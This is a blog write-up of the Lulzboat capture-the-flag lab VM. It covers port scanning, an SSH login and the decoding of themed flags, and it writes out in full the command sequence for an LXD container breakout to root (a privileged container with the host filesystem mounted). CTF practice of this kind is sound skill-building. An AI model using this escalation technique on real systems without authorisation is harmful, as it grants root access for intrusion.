Setting sail on the Lulzboat capture the flag virtual machine

Posted on Posted in Security

Introduction

In between client projects, marketing, sales and looking after the lab I try and keep my technical skills sharp. One way I do this is to practise in the lab and on CTF arenas. I was cruising twitter for threat intel and keeping in touch with the community and saw @ZachBarker1338 had submitted a VM to hack the box. Unfortunately, for a number of reasons it didn’t meet the HTB review criteria, but that didn’t stop the VM getting published in another manner. @ZachBarker1338 collaborated with Secjuice (https://www.secjuice.com/) to release the lulzboat CTF challenge VM.

Steps

  1. Download the virtual machine (you will need Oracle Virtualbox installed)- https://www.secjuice.com/lulzboat-ctf-by-lulzseczombie/
  2. Configure networking (I had to use private host networking to gain access to the VM, you may get access on a DHCP net, but I tried a few different DHCP enabled segments with no joy)
  3. Load up a kali instance (I setup a Kali VM in virtualbox with dual NICS to provide internet access)
  4. Enumerate and hack your way in
  5. Use your lulzsec knowledge (or Wikipedia) to decipher the clues to finaly reveal the flags

Breakdown (spoilers ahead)

Phase 1 Recon

Nmap the host:

Nmap -F -T5 -Pn 192.168.56.103

We can see here that TCP 80 and 22 are open

Phase 2 – Action on target (usermode)

Now we have the password we now need to log into the VM over SSH. As you can see from the text, we don’t  know the username. In traditional hack the box style the username is the creator of the virtual machine – in this case, lulzseczombie.

A quick ssh [email protected] gives us a user mode shell:

So now we confirm usermode, we grab the user.txt flag!

A shrubbery…. Lulzsec… that can only mean the user flag is “Topriary” (https://www.merriam-webster.com/dictionary/topiary)

Next, it’s time to start hunting for a privilege escalation route.

In this instance it’s possible to locate the privilege escalation route just by running the id command:

However, that’s retrospective. I personally found the route (this wasn’t actually the planned priv esc route, there’s a kernel vulnerability as well that can be exploited!) by uploading linenum.sh and executing:

LXD looks interesting as it’s a Linux container solution which just screamed out as container breakout!

Next steps were to download the alpine image onto the KALI VM

git clone https://github.com/saghul/lxd-alpine-builder.git

cd alpine

./build-alpine

scp alpine-v3.7-x86_64-20180621_0444.tar.gz [email protected]

#ssh to the lulzboat VM

mkdir lulz

mv alpine-v3.7-x86_64-20180621_0444.tar.gz lulz

cd lulz

lxc import alpine-v3.7-x86_64-20180621_0444.tar.gz –alias lulz

#list the image

lxc image list

#use privileged mode

lxc init lulz ignite -c security.privileged=true

#mount the host filesystem

lxc config device add ignite mydevice disk path=/mnt/root source=/ recursive=true

#execute a shell on the container

lxc exec ignite /bin/sh

#Navigate to the mounted root path and cat the flag

 

Finally, we can see the flag is DES encrypted. The clue here is the lulzsec motto…

So, we head over to a web based DES decryption tool to start trying to decrypt (yes this wasn’t a first hit IRL, I went all over the houses first generating a wordlist etc.)

So, there we have it! From zero to hero with some simple enumeration and a bit of a history test thrown in. I really enjoyed this challenge, the lulzsec theme was fun and the route to pwn this box was at a reasonable level. Well done to @Cephurs and @knoself for getting first blood and second place!

If you are interested in expanding your skills, capture the flag competitions are a great way to hone your skills, there are some great platforms out there such as:

Thanks to @ZachBarker1338 for taking the time to put this together and @secjuice for publishing!

Leave a Reply

Your email address will not be published. Required fields are marked *